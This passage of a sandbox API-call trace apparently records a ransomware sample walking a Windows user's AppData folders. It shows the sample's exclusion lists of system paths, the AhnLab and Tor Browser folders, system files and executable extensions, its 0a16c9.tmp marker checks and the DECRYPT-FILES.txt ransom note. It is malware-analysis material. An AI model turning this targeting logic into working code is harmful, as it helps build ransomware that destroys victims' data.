lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Microsoft\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Program Files") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch=":\\Windows") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Games\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\All Users") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="AhnLab") returned 0x0 [0180.453] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.453] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0180.453] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.453] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\0a16c9.tmp") returned 67 [0180.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0180.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0180.454] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.454] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt") returned 74 [0180.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.455] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0180.455] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*" [0180.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0180.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.455] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.455] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.456] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeadace0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.456] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.456] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.456] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.456] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.456] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.456] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0180.456] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.456] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" [0180.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\0a16c9.tmp" [0180.456] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.456] CloseHandle (hObject=0x0) returned 0 [0180.457] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.457] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0180.457] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0180.457] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0180.457] lstrcatW (in: lpString1="AddIns", lpString2="\\" | out: lpString1="AddIns\\") returned="AddIns\\" [0180.457] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="AddIns\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Program Files") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch=":\\Windows") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Games\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\All Users") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="AhnLab") returned 0x0 [0180.457] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0180.457] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.457] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\0a16c9.tmp") returned 74 [0180.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.458] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0180.458] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.458] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\DECRYPT-FILES.txt") returned 81 [0180.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0180.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0180.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.459] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.459] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeb00e40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeb00e40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeb00e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.459] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.459] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.459] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.459] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.459] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.459] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0180.459] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.459] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" [0180.460] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\0a16c9.tmp" [0180.460] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.460] CloseHandle (hObject=0x0) returned 0 [0180.460] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.460] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.460] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.460] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.460] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.460] CloseHandle (hObject=0x26c) returned 1 [0180.460] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa53cfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa53cfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0180.460] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0180.460] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0180.461] lstrcatW (in: lpString1="Credentials", lpString2="\\" | out: lpString1="Credentials\\") returned="Credentials\\" [0180.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\" [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Program Files") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch=":\\Windows") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Games\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\All Users") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="AhnLab") returned 0x0 [0180.461] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.461] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0180.461] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.461] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\0a16c9.tmp") returned 79 [0180.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0180.462] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.462] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt") returned 86 [0180.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 68 [0180.462] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0180.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 